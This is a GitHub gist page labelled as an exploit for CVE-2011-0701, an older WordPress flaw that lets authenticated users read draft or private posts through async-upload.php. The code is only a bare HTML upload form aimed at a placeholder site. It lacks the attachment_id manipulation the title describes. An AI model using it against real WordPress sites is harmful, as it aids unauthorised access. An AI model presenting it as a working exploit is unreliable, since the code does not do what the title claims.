Last active
July 15, 2022 08:12
-
-
Save Cvar1984/60228ef18ef4e21e9e49531d10c782f0 to your computer and use it in GitHub Desktop.
CVE-2011-0701 wp-admin/async-upload.php in the media uploader in WordPress before 3.0.5 allows remote authenticated users to read (1) draft posts or (2) private posts via a modified attachment_id parameter.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <form enctype="multipart/form-data" action="https://example.com/wp-admin/async-upload.php" method="post"> | |
| <input type="file" name="uploadfile"> | |
| <input type="submit" value="upload"> | |
| </form> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment